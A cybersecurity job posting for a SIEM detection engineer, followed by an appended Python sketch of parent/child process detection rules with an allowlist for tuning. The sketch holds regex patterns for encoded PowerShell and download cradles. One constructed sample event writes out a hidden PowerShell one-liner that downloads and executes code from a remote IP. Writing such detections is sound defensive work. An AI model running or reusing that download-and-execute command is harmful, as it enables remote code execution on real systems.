RemoteHunter is a cybersecurity organization founded by former National Security Agency cyber operations experts, currently in hyper-growth. The role focuses on building and tuning high-fidelity detections using SIEM data sources to ensure strong coverage across partner environments.
Responsibilities:
- Create, test, and maintain detection logic and rules for new and emerging threats using SIEM telemetry
- Tune alerts to reduce false positives and minimize detection gaps for efficient 24x7 SOC operation
- Build and refine detections using diverse log sources, including firewall, network security, endpoint, identity, cloud, and DNS data
- Collaborate with SOC analysts to identify common patterns and translate them into durable detection content
- Assist in designing dashboards and visualizations for threat trends, detection performance, and customer-specific patterns
- Partner with ingestion and platform teams to troubleshoot parsing, normalization, indexing, and data availability issues
- Build and maintain test environments and validation workflows to verify detections against real-world attacker tactics, techniques, and procedures
- Support incident response by reviewing SOC-mitigated activity and writing detections based on observed tradecraft
- Contribute to enrichment and automation improvements to reduce investigation time and improve analyst decision-making
Requirements:
- Five or more years of experience in an information security role; relevant training or certification may substitute for one year
- Two or more years of experience with system tuning or engineering (SIEM, EDR, logging pipelines, or analytics platforms)
- Strong experience writing SIEM detections and queries (e.g., Elasticsearch/Kibana)
- Familiarity with common network security and firewall logs, including FortiGate, SonicWall, and similar vendor integrations
- Familiarity with normalized event schemas such as OCSF (Open Cybersecurity Schema Framework)
- Working knowledge of Windows threat indicators and attacker behaviors (process execution, persistence, lateral movement, credential access, C2 patterns)
- Knowledge of attacker tools, including legitimate software abused maliciously
- Familiarity with parent/child process relationships and command-line arguments for identifying suspicious activity
- Ability to troubleshoot and debug data ingestion issues like parsing errors, missing fields, and normalization gaps
- Excellent communication skills to summarize findings and present detection rationale and trends
- Ability to work independently with strong problem-solving skills
- Experience in SOC, threat hunting, or DFIR preferred
- Experience with log onboarding and integrations (syslog, agents, API-based collection) across MSP stacks
- Basic scripting/automation skills (Python and/or PowerShell) to support enrichment, detection testing, or workflow improvements
- Experience creating Sigma and/or YARA rules and validating against adversary tactics, techniques, and procedures
- Proficiency with Power BI or Kibana dashboards for detection and trend visualization
- Network or System Administration experience
- Relevant certifications such as CRTO or eCPTX
- Deep forensic knowledge of Windows, macOS, or Linux
- Malware analysis experience (behavioral or static)
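As an added illustration (not part of the posting, and not RemoteHunter's own detection content), the following Python sketch shows the kind of parent/child process and command-line logic the requirements above describe, run over constructed Sysmon-style process-creation records. It also shows the tuning point from the responsibilities list: an allowlist that suppresses a known-good parent/child pairing without blinding the rule to an encoded command or download cradle from the same pairing. The image names, regexes, allowlist entry and sample events are assumptions chosen for demonstration, not vendor rules or real telemetry.

```python
"""Added example: minimal parent/child + command-line detection over constructed
process-creation events. Field names, patterns and the allowlist are assumptions."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Constructed process-creation record (roughly the fields of Sysmon Event ID 1)."""
    parent_image: str
    image: str
    command_line: str
    user: str


@dataclass
class Alert:
    event: ProcessEvent
    reasons: list


# Office applications whose children should almost never be a shell or script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Shells and script hosts commonly abused as the first stage after a malicious document.
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# PowerShell -EncodedCommand (or any of its accepted prefix abbreviations) followed by a base64 blob.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")
# Tokens typical of download-cradle one-liners.
DOWNLOAD_CRADLE = re.compile(r"(?i)downloadstring|invoke-webrequest|net\.webclient|\biwr\b")


def basename(path: str) -> str:
    """Lower-case file name of an image path, so rules match regardless of install location."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcessEvent) -> list:
    """Return the names of the rules this event matched (empty list means benign)."""
    reasons = []
    parent, child = basename(ev.parent_image), basename(ev.image)
    if parent in OFFICE_PARENTS and child in SHELL_CHILDREN:
        reasons.append("office_spawns_shell")
    if ENCODED_FLAG.search(ev.command_line):
        reasons.append("encoded_powershell")
    if DOWNLOAD_CRADLE.search(ev.command_line):
        reasons.append("download_cradle")
    return reasons


# Tuning: (parent, child, user) triples known to be legitimate in this environment (assumed).
# An entry suppresses only the bare parent/child pairing; an encoded command or download
# cradle from the same triple still alerts, so the allowlist does not open a detection gap.
ALLOWLIST = {("excel.exe", "cmd.exe", "svc_reporting")}


def evaluate(events, allowlist=ALLOWLIST):
    """Run every event through the rules; return (alerts, number suppressed by the allowlist)."""
    alerts, suppressed = [], 0
    for ev in events:
        reasons = classify(ev)
        if not reasons:
            continue
        key = (basename(ev.parent_image), basename(ev.image), ev.user)
        if key in allowlist and reasons == ["office_spawns_shell"]:
            suppressed += 1
            continue
        alerts.append(Alert(ev, reasons))
    return alerts, suppressed


# Constructed sample telemetry (not real logs). The base64 string is an arbitrary placeholder blob.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA", "alice"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe Get-ChildItem C:\\Users\\bob\\Documents", "bob"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c refresh_report.bat", "svc_reporting"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://198.51.100.7/a')\"", "svc_reporting"),
]

if __name__ == "__main__":
    found, quiet = evaluate(SAMPLE_EVENTS)
    print(f"{len(found)} alert(s), {quiet} suppressed by allowlist")
    for a in found:
        print(f"  {a.event.user}: {basename(a.event.parent_image)} -> {basename(a.event.image)} {a.reasons}")
```

Run as a script, the sketch alerts on the Word-spawned encoded PowerShell and on the Excel-spawned download cradle, while the scheduled report job from the allowlisted service account is suppressed; the same event shape is what a Sigma rule on `ParentImage`, `Image` and `CommandLine` would express declaratively.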